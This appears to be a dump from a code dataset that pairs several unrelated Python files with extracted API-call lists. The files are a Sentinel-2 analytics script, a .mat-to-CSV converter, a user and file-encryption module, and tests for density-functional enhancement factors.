] | [((856, 884), 'pytest.fixture', 'pytest.fixture', ([], {'params': 'PAIRS'}), '(params=PAIRS)\n', (870, 884), False, 'import pytest\n'), ((1148, 1164), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (1162, 1164), False, 'import pytest\n'), ((1361, 1377), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (1375, 1377), False, 'import pytest\n'), ((1824, 1840), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (1838, 1840), False, 'import pytest\n'), ((2302, 2318), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (2316, 2318), False, 'import pytest\n'), ((2569, 2585), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (2583, 2585), False, 'import pytest\n'), ((3059, 3075), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (3073, 3075), False, 'import pytest\n'), ((3574, 3590), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (3588, 3590), False, 'import pytest\n'), ((3853, 3869), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (3867, 3869), False, 'import pytest\n'), ((4135, 4151), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (4149, 4151), False, 'import pytest\n'), ((4653, 4669), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (4667, 4669), False, 'import pytest\n'), ((1012, 1068), 'requests.get', 'requests.get', (['request.param[0]'], {'headers': 'request.param[1]'}), '(request.param[0], headers=request.param[1])\n', (1024, 1068), False, 'import requests\n'), ((1283, 1304), 'requests.get', 'requests.get', (['URLS[1]'], {}), '(URLS[1])\n', (1295, 1304), False, 'import requests\n'), ((2491, 2512), 'requests.get', 'requests.get', (['URLS[4]'], {}), '(URLS[4])\n', (2503, 2512), False, 'import requests\n'), ((3775, 3796), 'requests.get', 'requests.get', (['URLS[7]'], {}), '(URLS[7])\n', (3787, 3796), False, 'import requests\n'), ((4057, 4078), 'requests.get', 'requests.get', (['URLS[8]'], {}), '(URLS[8])\n', (4069, 4078), False, 'import requests\n'), ((1704, 1725), 'requests.get', 'requests.get', (['URLS[2]'], {}), '(URLS[2])\n', (1716, 1725), False, 'import requests\n'), ((2182, 2203), 'requests.get', 'requests.get', (['URLS[3]'], {}), '(URLS[3])\n', (2194, 2203), False, 'import requests\n'), ((2939, 2960), 'requests.get', 'requests.get', (['URLS[5]'], {}), '(URLS[5])\n', (2951, 2960), False, 'import requests\n'), ((3454, 3475), 'requests.get', 'requests.get', (['URLS[6]'], {}), '(URLS[6])\n', (3466, 3475), False, 'import requests\n'), ((4533, 4554), 'requests.get', 'requests.get', (['URLS[9]'], {}), '(URLS[9])\n', (4545, 4554), False, 'import requests\n'), ((5071, 5093), 'requests.get', 'requests.get', (['URLS[10]'], {}), '(URLS[10])\n', (5083, 5093), False, 'import requests\n')] |
# -*- coding: utf-8 -*-
#!/usr/bin/env python3
from __future__ import print_function
import numpy as np
import os
import argparse
import time
import pandas as pd
from termcolor import colored
from analytics.analyzer import Sentinel2Analyzer
parser = argparse.ArgumentParser(description='Sentinel 2 All band median analytics ')
parser.add_argument("datafolder", help="/path/to/Data/Folder")
parser.add_argument("maskPath", help="/path/to/geotiff/mask.tiff")
parser.add_argument("analyticsSavingPath", help="/path/to/save/analytics_data")
args = parser.parse_args()
data_dir=args.datafolder
mask_path=args.maskPath
analytics_data_path=args.analyticsSavingPath
analyzer=Sentinel2Analyzer()
df=pd.DataFrame(columns=analyzer.analytics_parameters)
saveAsCSV=True
def moduleRun(data_dir,df):
zones=os.listdir(data_dir)
for zone in zones:
dpath=os.path.join(data_dir,zone)
fpaths=os.listdir(dpath)
for fpath in fpaths:
start_time = time.time()
directory=os.path.join(data_dir,zone,fpath)
get_analytics(directory,mask_path,analytics_data_path)
temp=pd.DataFrame([analyzer.analytics_values],columns=analyzer.analytics_parameters)
df=df.append(temp,ignore_index=True)
print(colored('\t|- Time Elapsed : {file_name:s} in {te:s}'.format(file_name=os.path.basename(directory),te=str(time.time()-start_time)),'red'))
print()
return df
def get_analytics(directory,mask_path,analytics_data_path):
analyzer.mask_path=mask_path
analyzer.analytics_data_path=analytics_data_path
analyzer.generateAnalytics(directory)
'''
CODE TO TURN CSV INTO DF:
csv_file_name=''
df=pd.read_csv(csv_file_name,sep='\t',skiprows=[0],names=col_names)
'''
if __name__=='__main__':
df=moduleRun(data_dir,df)
df['Acquisition_Date']=pd.to_datetime(df['Acquisition_Date'])
df.set_index(['Acquisition_Date'],inplace=True)
df=df.sort_index()
csv_file_name=os.path.join(analyzer.analytics_data_path,'analytics.csv')
df.to_csv(csv_file_name, sep='\t', encoding='utf-8')
print(colored('# Saved analytics at: {}'.format(csv_file_name),'green'))
| [
"os.listdir",
"analytics.analyzer.Sentinel2Analyzer",
"argparse.ArgumentParser",
"os.path.join",
"os.path.basename",
"pandas.DataFrame",
"time.time",
"pandas.to_datetime"
] | [((252, 328), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Sentinel 2 All band median analytics """'}), "(description='Sentinel 2 All band median analytics ')\n", (275, 328), False, 'import argparse\n'), ((671, 690), 'analytics.analyzer.Sentinel2Analyzer', 'Sentinel2Analyzer', ([], {}), '()\n', (688, 690), False, 'from analytics.analyzer import Sentinel2Analyzer\n'), ((695, 746), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': 'analyzer.analytics_parameters'}), '(columns=analyzer.analytics_parameters)\n', (707, 746), True, 'import pandas as pd\n'), ((803, 823), 'os.listdir', 'os.listdir', (['data_dir'], {}), '(data_dir)\n', (813, 823), False, 'import os\n'), ((1932, 1970), 'pandas.to_datetime', 'pd.to_datetime', (["df['Acquisition_Date']"], {}), "(df['Acquisition_Date'])\n", (1946, 1970), True, 'import pandas as pd\n'), ((2079, 2138), 'os.path.join', 'os.path.join', (['analyzer.analytics_data_path', '"""analytics.csv"""'], {}), "(analyzer.analytics_data_path, 'analytics.csv')\n", (2091, 2138), False, 'import os\n'), ((865, 893), 'os.path.join', 'os.path.join', (['data_dir', 'zone'], {}), '(data_dir, zone)\n', (877, 893), False, 'import os\n'), ((908, 925), 'os.listdir', 'os.listdir', (['dpath'], {}), '(dpath)\n', (918, 925), False, 'import os\n'), ((980, 991), 'time.time', 'time.time', ([], {}), '()\n', (989, 991), False, 'import time\n'), ((1027, 1062), 'os.path.join', 'os.path.join', (['data_dir', 'zone', 'fpath'], {}), '(data_dir, zone, fpath)\n', (1039, 1062), False, 'import os\n'), ((1171, 1256), 'pandas.DataFrame', 'pd.DataFrame', (['[analyzer.analytics_values]'], {'columns': 'analyzer.analytics_parameters'}), '([analyzer.analytics_values], columns=analyzer.analytics_parameters\n )\n', (1183, 1256), True, 'import pandas as pd\n'), ((1403, 1430), 'os.path.basename', 'os.path.basename', (['directory'], {}), '(directory)\n', (1419, 1430), False, 'import os\n'), ((1438, 1449), 'time.time', 'time.time', ([], {}), '()\n', (1447, 1449), False, 'import time\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/9/16 13:23
# @Author : JackyLUO
# @E-mail : <EMAIL>
# @Site :
# @File : read_mat.py
# @Software: PyCharm
import pandas as pd
import scipy.io as scio
dataFile = "roc_curves/CUHKMED/roc_curve.mat"
data = scio.loadmat(dataFile)
fpr = data['fpr'][0]
tpr = data['tpr'][0]
df = pd.DataFrame({'FPR': fpr, 'TPR': tpr})
df.to_csv("res.csv")
| [
"pandas.DataFrame",
"scipy.io.loadmat"
] | [((277, 299), 'scipy.io.loadmat', 'scio.loadmat', (['dataFile'], {}), '(dataFile)\n', (289, 299), True, 'import scipy.io as scio\n'), ((349, 387), 'pandas.DataFrame', 'pd.DataFrame', (["{'FPR': fpr, 'TPR': tpr}"], {}), "({'FPR': fpr, 'TPR': tpr})\n", (361, 387), True, 'import pandas as pd\n')] |
import os
from datetime import datetime, timedelta
from src.database.models.user import User # noqa
from src.database.models.file import File # noqa
from src.database.session import db_session # noqa
from src.utils.hash import hash_pass
from sqlalchemy.orm.exc import NoResultFound
from src.utils.cipher import encrypt_file, decrypt_file
from src.utils.hash import hash_md5, generate_token
from src.utils.mail_sender import send_mail_login
def create_user(username, email, password):
user = User(username=username, email=email, hashed_password=hash_pass(username, password))
try:
db_session.add(user)
db_session.commit()
db_session.flush()
return user
except:
db_session.rollback()
return None
def connect_user(username, password):
user = db_session.query(User).filter(User.username == username).first()
if user and user.check_password(password=password):
user.login_token = str(generate_token())
user.login_token_expiration = (datetime.now() + timedelta(minutes=5)).timestamp()
db_session.add(user)
db_session.commit()
db_session.flush()
send_mail_login(str(user.email), user.login_token)
return user
return None
def encrypt_user_file(user, path, key):
if not key:
print("Error: se debe ingresar una clave")
return
if not path:
print("Error: se debe ingresar una ruta de archivo")
return
nonce, ciphertext, mac = encrypt_file(hash_md5(key).encode("utf8"), path)
if not ciphertext:
print("Error al encriptar el archivo, puede que el archivo que quiera encriptar este vacio")
return
user.files.append(
File(name=os.path.basename(path), encrypted_file=ciphertext, nonce=nonce, mac=mac)
)
db_session.commit()
def decrypt_user_file(user, file_id, path, key):
if not path:
print("No se especifico una ruta de archivo para guadar")
return
try:
decrypt_file(
hash_md5(key).encode("utf8"),
db_session.query(File).filter(File.id == file_id).one(),
path,
)
except NoResultFound:
print("El archivo no existe")
except Exception:
print("Error inesperado")
def check_token_user(user, token):
if user.login_token and user.login_token_expiration:
date = datetime.fromtimestamp(user.login_token_expiration)
if (date - datetime.now()).total_seconds() > 0:
if user.login_token == token:
return True
else:
print("Token invaldo")
else:
print("Token expirado")
return False
| [
"src.database.session.db_session.commit",
"src.database.session.db_session.rollback",
"datetime.datetime.fromtimestamp",
"src.utils.hash.hash_md5",
"src.utils.hash.hash_pass",
"src.database.session.db_session.add",
"src.utils.hash.generate_token",
"src.database.session.db_session.flush",
"src.databa... | [((1811, 1830), 'src.database.session.db_session.commit', 'db_session.commit', ([], {}), '()\n', (1828, 1830), False, 'from src.database.session import db_session\n'), ((604, 624), 'src.database.session.db_session.add', 'db_session.add', (['user'], {}), '(user)\n', (618, 624), False, 'from src.database.session import db_session\n'), ((633, 652), 'src.database.session.db_session.commit', 'db_session.commit', ([], {}), '()\n', (650, 652), False, 'from src.database.session import db_session\n'), ((661, 679), 'src.database.session.db_session.flush', 'db_session.flush', ([], {}), '()\n', (677, 679), False, 'from src.database.session import db_session\n'), ((1081, 1101), 'src.database.session.db_session.add', 'db_session.add', (['user'], {}), '(user)\n', (1095, 1101), False, 'from src.database.session import db_session\n'), ((1110, 1129), 'src.database.session.db_session.commit', 'db_session.commit', ([], {}), '()\n', (1127, 1129), False, 'from src.database.session import db_session\n'), ((1138, 1156), 'src.database.session.db_session.flush', 'db_session.flush', ([], {}), '()\n', (1154, 1156), False, 'from src.database.session import db_session\n'), ((2379, 2430), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', (['user.login_token_expiration'], {}), '(user.login_token_expiration)\n', (2401, 2430), False, 'from datetime import datetime, timedelta\n'), ((556, 585), 'src.utils.hash.hash_pass', 'hash_pass', (['username', 'password'], {}), '(username, password)\n', (565, 585), False, 'from src.utils.hash import hash_pass\n'), ((720, 741), 'src.database.session.db_session.rollback', 'db_session.rollback', ([], {}), '()\n', (739, 741), False, 'from src.database.session import db_session\n'), ((965, 981), 'src.utils.hash.generate_token', 'generate_token', ([], {}), '()\n', (979, 981), False, 'from src.utils.hash import hash_md5, generate_token\n'), ((1512, 1525), 'src.utils.hash.hash_md5', 'hash_md5', (['key'], {}), '(key)\n', (1520, 1525), False, 'from src.utils.hash import hash_md5, generate_token\n'), ((1728, 1750), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (1744, 1750), False, 'import os\n'), ((813, 835), 'src.database.session.db_session.query', 'db_session.query', (['User'], {}), '(User)\n', (829, 835), False, 'from src.database.session import db_session\n'), ((1022, 1036), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1034, 1036), False, 'from datetime import datetime, timedelta\n'), ((1039, 1059), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (1048, 1059), False, 'from datetime import datetime, timedelta\n'), ((2023, 2036), 'src.utils.hash.hash_md5', 'hash_md5', (['key'], {}), '(key)\n', (2031, 2036), False, 'from src.utils.hash import hash_md5, generate_token\n'), ((2450, 2464), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (2462, 2464), False, 'from datetime import datetime, timedelta\n'), ((2065, 2087), 'src.database.session.db_session.query', 'db_session.query', (['File'], {}), '(File)\n', (2081, 2087), False, 'from src.database.session import db_session\n')] |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for symbolic.enhancement_factors."""
import copy
from absl.testing import absltest
from absl.testing import parameterized
import jax
import numpy as np
import sympy
from symbolic_functionals.syfes.symbolic import enhancement_factors
from symbolic_functionals.syfes.symbolic import instructions
from symbolic_functionals.syfes.xc import gga
from symbolic_functionals.syfes.xc import mgga
jax.config.update('jax_enable_x64', True)
class EnhancementFactorTest(parameterized.TestCase):
def setUp(self):
super().setUp()
self.num_features = 2
self.num_shared_parameters = 2
self.num_variables = 3
self.features = {
f'feature_{i}': np.random.rand(5) for i in range(self.num_features)
}
self.shared_parameters = {
f'shared_parameter_{i}': np.random.rand()
for i in range(self.num_shared_parameters)
}
self.bound_parameters = {'gamma_utransform': np.random.rand()}
self.parameters = {**self.shared_parameters, **self.bound_parameters}
self.variables = {
f'variable_{i}': np.zeros(5) for i in range(self.num_variables - 1)
}
self.variables.update({'enhancement_factor': np.zeros(5)})
self.enhancement_factor = enhancement_factors.EnhancementFactor(
feature_names=list(self.features.keys()),
shared_parameter_names=list(self.shared_parameters.keys()),
variable_names=list(self.variables.keys()),
instruction_list=[
instructions.MultiplicationInstruction(
'variable_0', 'feature_0', 'shared_parameter_0'),
instructions.AdditionInstruction(
'variable_1', 'feature_1', 'shared_parameter_1'),
instructions.AdditionInstruction(
'variable_1', 'variable_1', 'variable_0'),
instructions.Power2Instruction('enhancement_factor', 'variable_1'),
instructions.UTransformInstruction(
'enhancement_factor', 'enhancement_factor')
])
def test_constructor(self):
self.assertEqual(self.enhancement_factor.num_features, self.num_features)
self.assertEqual(self.enhancement_factor.num_parameters,
self.num_shared_parameters + 1) # 1 from UTransform
self.assertEqual(self.enhancement_factor.num_variables, self.num_variables)
def test_constructor_without_enhancement_factor_in_variable_names(self):
with self.assertRaisesRegex(
ValueError, '"enhancement_factor" not found in variable_names.'):
enhancement_factors.EnhancementFactor(
feature_names=[],
shared_parameter_names=[],
variable_names=[],
instruction_list=[])
def test_constructor_with_repeated_name(self):
with self.assertRaisesRegex(ValueError, 'Repeated names found in input.'):
enhancement_factors.EnhancementFactor(
feature_names=['var'],
shared_parameter_names=['var'],
variable_names=['enhancement_factor'],
instruction_list=[])
def test_constructor_with_wrong_instruction_type(self):
with self.assertRaisesRegex(
TypeError, r"1 is of type <class 'int'>, not an "
'instance of instructions.Instruction'):
enhancement_factors.EnhancementFactor(
feature_names=list(self.features.keys()),
shared_parameter_names=list(self.shared_parameters.keys()),
variable_names=list(self.variables.keys()),
instruction_list=[1])
@parameterized.parameters(
(instructions.Power2Instruction('variable_0', 'var'),
(r'Instruction variable_0 = var \*\* 2 contains invalid input argument '
'var')),
(instructions.AdditionInstruction('variable_0', 'shared_parameter_1',
'gamma_utransform'),
(r'Instruction variable_0 = shared_parameter_1 \+ gamma_utransform '
'contains invalid input argument gamma_utransform')),
)
def test_constructor_with_invalid_input(self, instruction, error_message):
with self.assertRaisesRegex(ValueError, error_message):
enhancement_factors.EnhancementFactor(
feature_names=list(self.features.keys()),
shared_parameter_names=list(self.shared_parameters.keys()),
variable_names=list(self.variables.keys()),
instruction_list=[instruction])
@parameterized.parameters(
(instructions.Power2Instruction('feature_0', 'shared_parameter_0'),
(r'Instruction feature_0 = shared_parameter_0 \*\* 2 contains '
'invalid output argument feature_0')),
(instructions.AdditionInstruction(
'feature_1', 'shared_parameter_1', 'variable_1'),
(r'Instruction feature_1 = shared_parameter_1 \+ variable_1 contains '
'invalid output argument feature_1')
),
(instructions.Power4Instruction(
'bound_parameter_1', 'shared_parameter_1'),
(r'Instruction bound_parameter_1 = shared_parameter_1 \*\* 4 contains '
'invalid output argument bound_parameter_1')
),
)
def test_constructor_with_invalid_output(self, instruction, error_message):
with self.assertRaisesRegex(ValueError, error_message):
enhancement_factors.EnhancementFactor(
feature_names=list(self.features.keys()),
shared_parameter_names=list(self.shared_parameters.keys()),
variable_names=list(self.variables.keys()),
instruction_list=[instruction])
@parameterized.parameters(False, True)
def test_eval(self, use_jax):
tmp = (
(self.features['feature_0'] * self.parameters['shared_parameter_0']) +
(self.features['feature_1'] + self.parameters['shared_parameter_1']))
tmp = self.parameters['gamma_utransform'] * tmp ** 2
expected_f = tmp / (1. + tmp)
f = self.enhancement_factor.eval(
self.features, self.parameters, use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(False, True)
def test_b97_u_enhancement_factor(self, use_jax):
gamma_x = 0.004
coeffs_x = 0.8094, 0.5073, 0.7481
x = np.random.rand(5)
u = gga.u_b97(x, gamma=gamma_x)
expected_f = gga.f_b97(x)
f = enhancement_factors.f_b97_u.eval(
features={'u': u},
parameters={
'c0': coeffs_x[0],
'c1': coeffs_x[1],
'c2': coeffs_x[2],
},
use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(False, True)
def test_b97_u_short_enhancement_factor(self, use_jax):
gamma_x = 0.004
coeffs_x = 0.8094, 0.5073, 0.7481
x = np.random.rand(5)
u = gga.u_b97(x, gamma=gamma_x)
expected_f = gga.f_b97(x)
f = enhancement_factors.f_b97_u_short.eval(
features={'u': u},
parameters={
'c0': coeffs_x[0],
'c1': coeffs_x[1],
'c2': coeffs_x[2],
},
use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(False, True)
def test_b97_x2_enhancement_factor(self, use_jax):
gamma_x = 0.004
coeffs_x = 0.8094, 0.5073, 0.7481
x = np.random.rand(5)
x2 = (1 / 2)**(-2 / 3) * x**2
expected_f = gga.f_b97(x)
f = enhancement_factors.f_b97_x2.eval(
features={'x2': x2},
parameters={
'c0': coeffs_x[0],
'c1': coeffs_x[1],
'c2': coeffs_x[2],
'gamma': gamma_x
},
use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(False, True)
def test_b97_x2_short_enhancement_factor(self, use_jax):
gamma_x = 0.004
coeffs_x = 0.8094, 0.5073, 0.7481
x = np.random.rand(5)
x2 = (1 / 2)**(-2 / 3) * x**2
expected_f = gga.f_b97(x)
f = enhancement_factors.f_b97_x2_short.eval(
features={'x2': x2},
parameters={
'c0': coeffs_x[0],
'c1': coeffs_x[1],
'c2': coeffs_x[2],
'gamma_utransform': gamma_x
},
use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(
(enhancement_factors.f_x_wb97mv,
enhancement_factors.f_css_wb97mv,
enhancement_factors.f_cos_wb97mv,
'gamma'),
(enhancement_factors.f_x_wb97mv_short,
enhancement_factors.f_css_wb97mv_short,
enhancement_factors.f_cos_wb97mv_short,
'gamma_utransform'),
)
def test_wb97mv_enhancement_factors(self,
f_x_wb97mv,
f_css_wb97mv,
f_cos_wb97mv,
gamma_key):
rho = np.random.rand(5)
x = np.random.rand(5)
tau = np.random.rand(5)
x2 = (1 / 2)**(-2 / 3) * x**2
t = mgga.get_mgga_t(rho, tau, polarized=False)
w = (t - 1) / (t + 1)
expected_f_x = mgga.f_b97m(
x, t, gamma=mgga.WB97MV_PARAMS['gamma_x'],
power_series=mgga.WB97MV_PARAMS['power_series_x'], polarized=False)
expected_f_css = mgga.f_b97m(
x, t, gamma=mgga.WB97MV_PARAMS['gamma_ss'],
power_series=mgga.WB97MV_PARAMS['power_series_ss'], polarized=False)
expected_f_cos = mgga.f_b97m(
x, t, gamma=mgga.WB97MV_PARAMS['gamma_os'],
power_series=mgga.WB97MV_PARAMS['power_series_os'], polarized=False)
f_x = f_x_wb97mv.eval(
features={'x2': x2, 'w': w},
parameters={
'c00': mgga.WB97MV_PARAMS['power_series_x'][0][2],
'c10': mgga.WB97MV_PARAMS['power_series_x'][1][2],
'c01': mgga.WB97MV_PARAMS['power_series_x'][2][2],
gamma_key: mgga.WB97MV_PARAMS['gamma_x']})
f_css = f_css_wb97mv.eval(
features={'x2': x2, 'w': w},
parameters={
'c00': mgga.WB97MV_PARAMS['power_series_ss'][0][2],
'c10': mgga.WB97MV_PARAMS['power_series_ss'][1][2],
'c20': mgga.WB97MV_PARAMS['power_series_ss'][2][2],
'c43': mgga.WB97MV_PARAMS['power_series_ss'][3][2],
'c04': mgga.WB97MV_PARAMS['power_series_ss'][4][2],
gamma_key: mgga.WB97MV_PARAMS['gamma_ss']})
f_cos = f_cos_wb97mv.eval(
features={'x2': x2, 'w': w},
parameters={
'c00': mgga.WB97MV_PARAMS['power_series_os'][0][2],
'c10': mgga.WB97MV_PARAMS['power_series_os'][1][2],
'c20': mgga.WB97MV_PARAMS['power_series_os'][2][2],
'c60': mgga.WB97MV_PARAMS['power_series_os'][3][2],
'c21': mgga.WB97MV_PARAMS['power_series_os'][4][2],
'c61': mgga.WB97MV_PARAMS['power_series_os'][5][2],
gamma_key: mgga.WB97MV_PARAMS['gamma_os']})
np.testing.assert_allclose(f_x, expected_f_x)
np.testing.assert_allclose(f_css, expected_f_css)
np.testing.assert_allclose(f_cos, expected_f_cos)
def test_convert_enhancement_factor_to_and_from_dict(self):
self.assertEqual(
self.enhancement_factor,
enhancement_factors.EnhancementFactor.from_dict(
self.enhancement_factor.to_dict()))
@parameterized.parameters(
enhancement_factors.f_empty,
enhancement_factors.f_lda,
enhancement_factors.f_b97_u,
enhancement_factors.f_b97_u_short,
enhancement_factors.f_b97_x2,
enhancement_factors.f_b97_x2_short,
enhancement_factors.f_x_wb97mv,
enhancement_factors.f_css_wb97mv,
enhancement_factors.f_cos_wb97mv,
enhancement_factors.f_x_wb97mv_short,
enhancement_factors.f_css_wb97mv_short,
enhancement_factors.f_cos_wb97mv_short,
)
def test_make_isomorphic_copy(self, enhancement_factor):
features = {
feature_name: np.random.rand(5)
for feature_name in enhancement_factor.feature_names
}
shared_parameters = {
parameter_name: np.random.rand()
for parameter_name in enhancement_factor.shared_parameter_names
}
renamed_shared_parameters = {
(enhancement_factor._isomorphic_copy_shared_parameter_prefix
+ str(index)): value
for index, value in enumerate(shared_parameters.values())
}
bound_parameters = {
parameter_name: np.random.rand()
for parameter_name in enhancement_factor.bound_parameter_names
}
enhancement_factor_copy = enhancement_factor.make_isomorphic_copy()
np.testing.assert_allclose(
enhancement_factor.eval(
features=features, parameters={
**shared_parameters, **bound_parameters}),
enhancement_factor_copy.eval(
features=features, parameters={
**renamed_shared_parameters, **bound_parameters})
)
def test_make_isomorphic_copy_of_f_x_wb97mv_short(self):
f_x_wb97mv_copy = enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy(
feature_names=['rho', 'x2', 'w'],
num_shared_parameters=10,
num_variables=10)
self.assertEqual(f_x_wb97mv_copy.feature_names, ['rho', 'x2', 'w'])
self.assertEqual(f_x_wb97mv_copy.num_shared_parameters, 10)
self.assertEqual(
f_x_wb97mv_copy.shared_parameter_names,
[f_x_wb97mv_copy._isomorphic_copy_shared_parameter_prefix + str(index)
for index in range(10)])
self.assertEqual(
f_x_wb97mv_copy.variable_names,
[f_x_wb97mv_copy._isomorphic_copy_variable_prefix + str(index)
for index in range(9)] + ['enhancement_factor'])
def test_make_isomorphic_copy_enhancement_factor_variable_location(self):
f_x_wb97mv_shuffled = copy.deepcopy(enhancement_factors.f_x_wb97mv_short)
f_x_wb97mv_shuffled.variable_names.remove('enhancement_factor')
f_x_wb97mv_shuffled.variable_names.insert(
np.random.randint(len(f_x_wb97mv_shuffled.variable_names)),
'enhancement_factor')
self.assertEqual(
enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy(),
f_x_wb97mv_shuffled.make_isomorphic_copy())
def test_make_isomorphic_copy_repeated_feature_names(self):
with self.assertRaisesRegex(
ValueError, 'Repeated feature names'):
enhancement_factors.f_b97_u.make_isomorphic_copy(
feature_names=['u', 'u'])
def test_make_isomorphic_copy_wrong_feature_names(self):
with self.assertRaisesRegex(
ValueError,
r"feature_names \['rho', 'x2'\] is not a superset of feature_names of "
r"current instance \['w', 'x2'\]"):
enhancement_factors.f_x_wb97mv.make_isomorphic_copy(
feature_names=['rho', 'x2'])
def test_make_isomorphic_copy_wrong_num_shared_parameters(self):
with self.assertRaisesRegex(
ValueError, 'num_shared_parameters 5 is smaller than '
'that of current instance 6'):
enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy(
num_shared_parameters=5)
def test_make_isomorphic_copy_wrong_num_variables(self):
with self.assertRaisesRegex(
ValueError, 'num_variables 3 is smaller than '
'that of current instance 5'):
enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy(
num_variables=3)
@parameterized.parameters(
(enhancement_factors.f_b97_u, 3),
(enhancement_factors.f_b97_u_short, 3),
(enhancement_factors.f_b97_x2, 4),
(enhancement_factors.f_b97_x2_short, 4),
(enhancement_factors.f_x_wb97mv_short, 4),)
def test_num_used_parameters(
self, enhancement_factor, expected_num_used_parameters):
self.assertEqual(enhancement_factor.num_used_parameters,
expected_num_used_parameters)
self.assertEqual(
enhancement_factor.make_isomorphic_copy(
num_shared_parameters=20).num_used_parameters,
expected_num_used_parameters)
def test_get_symbolic_expression(self):
c0, c1, c2, gamma, x = sympy.symbols(
'c0 c1 c2 gamma_utransform x')
self.assertEqual(
enhancement_factors.f_b97_x2_short.get_symbolic_expression(
latex=False, simplify=False),
(c0 + c1 * gamma * x ** 2 / (gamma * x ** 2 + 1.)
+ c2 * gamma ** 2 * x ** 4 / (gamma * x ** 2 + 1.) ** 2))
def test_get_symbolic_expression_latex(self):
self.assertEqual(
enhancement_factors.f_b97_x2_short.get_symbolic_expression(
latex=True, simplify=False),
r'c_{0} + \frac{c_{1} \gamma_{u} x^{2}}{\gamma_{u} x^{2} + 1.0} + '
r'\frac{c_{2} \gamma_{u}^{2} x^{4}}{\left(\gamma_{u} x^{2} + '
r'1.0\right)^{2}}')
if __name__ == '__main__':
absltest.main()
| [
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.eval",
"numpy.random.rand",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.get_symbolic_expression",
"symbolic_f... | [((1008, 1049), 'jax.config.update', 'jax.config.update', (['"""jax_enable_x64"""', '(True)'], {}), "('jax_enable_x64', True)\n", (1025, 1049), False, 'import jax\n'), ((6022, 6059), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (6046, 6059), False, 'from absl.testing import parameterized\n'), ((6499, 6536), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (6523, 6536), False, 'from absl.testing import parameterized\n'), ((7010, 7047), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (7034, 7047), False, 'from absl.testing import parameterized\n'), ((7533, 7570), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (7557, 7570), False, 'from absl.testing import parameterized\n'), ((8075, 8112), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (8099, 8112), False, 'from absl.testing import parameterized\n'), ((8640, 8932), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (["(enhancement_factors.f_x_wb97mv, enhancement_factors.f_css_wb97mv,\n enhancement_factors.f_cos_wb97mv, 'gamma')", "(enhancement_factors.f_x_wb97mv_short, enhancement_factors.\n f_css_wb97mv_short, enhancement_factors.f_cos_wb97mv_short,\n 'gamma_utransform')"], {}), "((enhancement_factors.f_x_wb97mv,\n enhancement_factors.f_css_wb97mv, enhancement_factors.f_cos_wb97mv,\n 'gamma'), (enhancement_factors.f_x_wb97mv_short, enhancement_factors.\n f_css_wb97mv_short, enhancement_factors.f_cos_wb97mv_short,\n 'gamma_utransform'))\n", (8664, 8932), False, 'from absl.testing import parameterized\n'), ((11615, 12069), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['enhancement_factors.f_empty', 'enhancement_factors.f_lda', 'enhancement_factors.f_b97_u', 'enhancement_factors.f_b97_u_short', 'enhancement_factors.f_b97_x2', 'enhancement_factors.f_b97_x2_short', 'enhancement_factors.f_x_wb97mv', 'enhancement_factors.f_css_wb97mv', 'enhancement_factors.f_cos_wb97mv', 'enhancement_factors.f_x_wb97mv_short', 'enhancement_factors.f_css_wb97mv_short', 'enhancement_factors.f_cos_wb97mv_short'], {}), '(enhancement_factors.f_empty, enhancement_factors.\n f_lda, enhancement_factors.f_b97_u, enhancement_factors.f_b97_u_short,\n enhancement_factors.f_b97_x2, enhancement_factors.f_b97_x2_short,\n enhancement_factors.f_x_wb97mv, enhancement_factors.f_css_wb97mv,\n enhancement_factors.f_cos_wb97mv, enhancement_factors.f_x_wb97mv_short,\n enhancement_factors.f_css_wb97mv_short, enhancement_factors.\n f_cos_wb97mv_short)\n', 